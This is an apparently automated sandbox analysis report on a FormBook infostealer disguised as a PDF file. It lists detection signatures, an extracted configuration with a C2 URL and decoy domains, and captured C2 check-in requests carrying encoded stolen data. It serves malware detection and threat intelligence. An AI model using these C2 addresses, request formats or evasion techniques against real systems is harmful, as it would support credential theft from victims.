Windows Analysis Report
101 2043 5770 pdf.exe

Overview

General Information

Sample name:	101 2043 5770 pdf.exe
Analysis ID:	1501602
MD5:	5e8e7dd95b3e592a44a3c61b7f8d91f8
SHA1:	d829b9e1e99087d94f527f359184f65b608190c5
SHA256:	8d278608d1d1c4c5b6c048020c23351e75203066af1ae1e63c5c5ac0170cd3de
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected FormBook malware

Found malware configuration

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Reads the DNS cache

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to resolve many domain names, but no domain seems valid

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Uses regedit.exe to modify the Windows registry

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Browser Data Stealing

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: www.a2zglobalimports.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store	Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.agritamaperkasaindonesia.com	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/www.mrawkward.xyz	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com	Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs/kmge/www.hhe-crv220.com	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store	Avira URL Cloud: Label: malware
Source: http://www.gsolartech.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/www.bedbillionaire.com	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.a2zglobalimports.com/kmge/"], "decoy": ["jia0752d.com", "cq0jt.sbs", "whimsicalweddingrentals.com", "meetsex-here.life", "hhe-crv220.com", "bedbillionaire.com", "soycmo.com", "mrawkward.xyz", "11ramshornroad.com", "motoyonaturals.com", "thischicloves.com", "gacorbet.pro", "ihsanid.com", "pancaketurner.com", "santanarstore.com", "cr3dtv.com", "negotools.com", "landfillequip.com", "sejasuapropriachefe.com", "diamant-verkopen.store", "builtonmybrother.art", "teoti.beauty", "kickssoccercamp.com", "chickfrau.com", "compare-energy.com", "icvp5o.xyz", "susan-writes.com", "dropletcoin.com", "sivertool.com", "sup-25987659.com", "weedz-seeds.today", "agritamaperkasaindonesia.com", "safwankhalil.com", "jm2s8a3mz.com", "wfjwjm.com", "be-heatpumps.life", "hcwoodpanel.com", "n5l780.com", "mandalah.art", "szexvideokingyen.sbs", "justinroemmick.com", "thecoolkidsdontfitin.com", "gsolartech.com", "swisswearables.com", "chicagocarpetcleaneril.com", "terrazahills-cbre.com", "santatainha.com", "sacksmantenimiento.store", "wzhem.rest", "shearwaterpembrokeshire.com", "baansantiburi.com", "mid-size-suv-87652.com", "solunchina.com", "nandos.moe", "blucretebistro.com", "identificatiekvk.digital", "8772876.com", "longfangyun.com", "litblacklit.com", "mobilferrari.com", "zeeedajewelermusic.com", "allenbach.swiss", "industrialrevolution.ink", "cmgamingtrack.com"]}

Multi AV Scanner detection for domain / URL

Source: www.mrawkward.xyz	Virustotal: Detection: 8%	Perma Link
Source: www.hhe-crv220.com	Virustotal: Detection: 7%	Perma Link
Source: www.icvp5o.xyz	Virustotal: Detection: 9%	Perma Link
Source: www.kickssoccercamp.com	Virustotal: Detection: 6%	Perma Link
Source: www.sacksmantenimiento.store	Virustotal: Detection: 8%	Perma Link
Source: www.cq0jt.sbs	Virustotal: Detection: 10%	Perma Link
Source: www.n5l780.com	Virustotal: Detection: 5%	Perma Link
Source: www.bedbillionaire.com	Virustotal: Detection: 9%	Perma Link
Source: http://www.mrawkward.xyz	Virustotal: Detection: 8%	Perma Link
Source: www.a2zglobalimports.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.cq0jt.sbs	Virustotal: Detection: 10%	Perma Link
Source: http://www.kickssoccercamp.com	Virustotal: Detection: 6%	Perma Link
Source: http://www.mrawkward.xyz/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.hhe-crv220.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.n5l780.com/kmge/www.szexvideokingyen.sbs	Virustotal: Detection: 6%	Perma Link
Source: http://www.n5l780.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.sejasuapropriachefe.com/kmge/	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\101 2043 5770 pdf.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: 101 2043 5770 pdf.exe	ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe	Virustotal: Detection: 16%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: 101 2043 5770 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E28C0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D7851EF0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF7D7967580
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D79672A0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rdi	0_2_00007FF7D78E3020
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rsi	0_2_00007FF7D78E2FB0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E2F60
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E2E20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbp	0_2_00007FF7D7904BA0
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rbx	0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then push rsi	0_2_00007FF7D78E7B00
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 4x nop then sub rsp, 28h	0_2_00007FF7D796FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 4x nop then pop esi	6_2_00417300
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop esi	9_2_00C57300

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49725 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49726 -> 204.11.56.48:80
Source: Network traffic	Suricata IDS: 2829004 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) : 192.168.2.6:49730 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.6:49729 -> 3.33.130.190:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.a2zglobalimports.com/kmge/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.icvp5o.xyz
Source:	DNS query: www.mrawkward.xyz

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: www.mrawkward.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.cq0jt.sbs replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.a2zglobalimports.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.sejasuapropriachefe.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.kickssoccercamp.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.icvp5o.xyz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.hhe-crv220.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.sacksmantenimiento.store replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.n5l780.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: www.bedbillionaire.com replaycode: Name error (3)

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /kmge/?9ryxAF1X=QP81EcQih7VsKdxvGCQICkK3NoxzpI9p/3Heqjlotj0m3GfPoWteGvRMVqRY4pahxYHvPZXphw==&sBZ4hH=X6X4HNUxL HTTP/1.1Host: www.landfillequip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 204.11.56.48 204.11.56.48

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 7_2_1124CF82 getaddrinfo,setsockopt,recv,

7_2_1124CF82

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: www.icvp5o.xyz
Source: global traffic	DNS traffic detected: DNS query: www.bedbillionaire.com
Source: global traffic	DNS traffic detected: DNS query: www.mrawkward.xyz
Source: global traffic	DNS traffic detected: DNS query: www.landfillequip.com
Source: global traffic	DNS traffic detected: DNS query: www.kickssoccercamp.com
Source: global traffic	DNS traffic detected: DNS query: www.cq0jt.sbs
Source: global traffic	DNS traffic detected: DNS query: www.hhe-crv220.com
Source: global traffic	DNS traffic detected: DNS query: www.sacksmantenimiento.store
Source: global traffic	DNS traffic detected: DNS query: www.a2zglobalimports.com
Source: global traffic	DNS traffic detected: DNS query: www.shearwaterpembrokeshire.com
Source: global traffic	DNS traffic detected: DNS query: www.sejasuapropriachefe.com
Source: global traffic	DNS traffic detected: DNS query: www.n5l780.com

Source: unknown

HTTP traffic detected: POST /kmge/ HTTP/1.1Host: www.landfillequip.comConnection: closeContent-Length: 178702Cache-Control: no-cacheOrigin: http://www.landfillequip.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.landfillequip.com/kmge/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 79 78 41 46 31 58 3d 59 74 77 50 61 36 39 41 6a 5f 34 64 57 5f 52 41 4d 79 64 77 53 44 4f 45 4a 35 52 51 68 4e 41 33 70 77 71 45 37 53 67 77 71 67 6f 7a 33 69 48 48 34 57 55 32 46 4b 73 51 47 37 6c 67 75 35 43 56 78 34 79 31 43 71 62 78 6a 77 45 74 56 51 61 5f 71 4c 77 58 65 57 31 35 45 65 41 77 77 5f 54 7a 79 75 63 31 31 38 59 39 32 65 65 37 45 39 58 6d 30 63 56 7a 33 47 49 53 43 62 77 48 57 46 50 44 77 30 36 65 32 54 49 70 4f 6f 34 6a 72 4e 31 67 44 55 69 33 75 44 69 48 50 32 48 78 28 6d 32 38 4a 6b 71 47 46 64 33 55 65 4f 6a 56 79 2d 35 5f 4f 59 63 4d 72 56 46 6e 53 4e 37 65 54 32 6d 7a 72 50 7a 47 6b 6f 31 76 59 45 30 6b 6f 6f 48 39 78 74 4e 2d 66 77 50 6c 72 4f 7e 62 33 4f 78 51 4c 6c 54 4a 6b 37 4a 69 37 6a 4a 51 63 62 33 30 4f 70 56 61 6b 37 64 49 70 73 49 4f 59 6c 54 4a 6f 32 6f 37 55 69 6d 56 77 6a 61 54 33 67 35 6a 6a 4f 68 48 4d 41 7e 39 4f 49 4b 67 76 53 55 4c 7e 77 44 49 71 65 50 6b 72 32 7e 4a 57 4e 45 6c 70 31 4e 76 58 5a 79 37 43 39 65 7a 61 31 57 56 32 59 4b 39 58 51 6b 47 38 54 68 47 4a 35 39 54 39 75 73 50 65 42 75 67 4a 35 74 63 68 79 62 6b 54 5a 39 79 33 4f 58 73 78 35 52 50 34 73 31 69 51 74 63 42 57 51 51 75 68 46 61 6e 6d 47 79 72 76 77 6e 49 74 63 32 77 78 68 41 50 6e 56 4d 4b 51 43 48 4f 46 78 35 6b 66 61 62 76 32 56 61 33 4d 61 52 4f 72 31 46 7a 36 38 30 49 66 62 57 71 58 31 36 6f 38 70 54 76 31 73 50 6f 42 78 34 32 6f 4f 41 44 48 66 35 43 50 56 55 31 53 76 48 78 52 69 51 79 44 70 79 33 68 31 6f 77 6a 44 6d 67 73 52 30 42 5a 32 28 4f 58 2d 56 38 42 50 55 55 51 6f 4b 46 38 2d 31 7a 4e 50 56 43 36 6f 6d 4b 66 45 79 58 44 41 70 43 57 35 77 4b 77 49 72 4b 46 68 78 33 36 2d 50 59 30 79 49 63 6f 56 6e 4b 56 71 32 6a 51 4f 7e 37 69 71 72 6b 6b 52 4b 5f 52 64 6e 72 7e 4d 43 6d 31 59 63 6d 64 33 6c 6b 33 37 69 38 63 51 4a 57 77 39 33 44 6e 7a 74 50 76 78 39 51 4c 56 7a 47 5a 2d 76 4f 6b 61 75 70 71 69 65 43 48 57 39 59 68 51 63 35 49 79 44 75 4c 4d 6c 48 54 72 4f 6e 57 32 31 76 53 51 65 78 70 69 73 75 6c 62 49 35 28 36 71 5f 4f 71 6c 57 28 6b 70 2d 6a 41 51 43 65 68 47 55 50 63 31 4b 61 50 7e 7a 42 54 49 48 34 39 34 2d 75 6b 79 4d 61 62 55 66 79 55 77 46 4f 6b 70 61 65 2d 54 66 49 33 76 67 77 31 4b 4a 50 4b 6b 39 69 53 38 4c 39 69 